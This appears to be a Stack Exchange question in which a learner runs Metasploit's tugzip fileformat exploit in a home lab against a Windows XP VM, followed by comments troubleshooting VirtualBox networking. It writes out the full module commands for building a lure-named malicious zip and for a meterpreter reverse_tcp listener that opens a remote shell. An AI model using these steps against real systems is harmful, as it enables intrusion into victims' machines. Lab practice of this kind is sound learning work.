# Reverse_tcp exploit on VM with Windows XP

Tags: penetration-test, exploit, metasploit

Well I'm doing learning to do pentest with Metasploit and i was using an exploit named "tugzip" that use a rever_tcp protocol so i actually installed Kali linux on my computer and used a virtual machine with Windows XP. So first i configure the tugzip like this:

`use exploit/windows/fileformat/tugzip
 set FILENAME HotGirl.zip
 set LHOST 172.16.98.1(IP that i could ping from my VM that i assume it was mine)
 set LPORT 443
 exploit`

I moved the file i created to the Windows XP VM session, and then i try to started a listener so i did:

`use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 show options
 set LHOST 172.16.98.1
 set LPORT 443`

so then apparently everything is fine because it shows me this:

`[*] Exploit running as background job 3.
 [*] Started reverse TCP handler on 172.16.98.1:443`

But when I opened the HotGirl.zip file on my Windows XP VM it won't open a new session on Metasploit i don't know nothing is happening.

p.s. I'm using VirtualBox

Comment: "IP that i could ping from my VM that i assume it was mine" go to your kali, open terminal and type "ifconfig". make sure the kali IP you use is the correct one.

Comment: You can see the in this picture https://imgur.com/VkxOeL6 that i'm using the vmnet1 IP because it's the one i'm using to create a bridge connection between my computer and my VM, if i even try to ping my WLAN IP it won't work.

Comment: Ok lets clear up a few things. Firstly, the kali box, is it a virtual machine? is the winxp box? or is the host one of these? the virtual network you created for these machines, are they both on the same one? X.X.X.1 is usually reserved for gateways not clients so it seems like you are trying to get the exploit to connect to the router. which wont work. Also what im looking for in ifconfig is ens33 or eth0 or wlan0 something like this which has the Kali IPv4 address

Comment: Kali is installed native on my computer and i'm using Virtual Box with Windows XP on Kali and they are both on the 172.16.98.x network i know that when and IP is x.x.x.1 the one is usually reserved for the gateway so i was suspicious about it and did a zenmap scan to see if there was another devices on with a IP 172.16.98.x on the virtual network but there wasn't. I even try to scan the 172.16.98.1 and it said it was linux with 0 hops so I assume it was me I was scanning. this are the zenmap results https://imgur.com/PMzPVoL

Comment: open a terminal on kali and try "dhclient eth0" if it says device eth0 not found replace it with "ens33" and try again. after this command is run type ifconfig again. does a new ip come up?

Comment: Its hard to decipher the network you are using. Or what problems are associated with it. bridging a vm usually results in the connection being made as though it were a standalone computer on your home network (therefore getting its ip from the router you use to connect to the internet.) There is also host-only networks you can create which will create a virtual network within the host OS so the VM can talk only to the host. The router in that case is one created by the virtualized environment for this purpose. I think figuring out this topology is the crux of your issues.

Comment: this is what happens if i put the commands you "dhclient eth0" or "dhclient ens33" https://imgur.com/5lLiUCR

Comment: Let us [continue this discussion in chat](http://chat.stackexchange.com/rooms/68915/discussion-between-nalaurien-and-nelson-candia).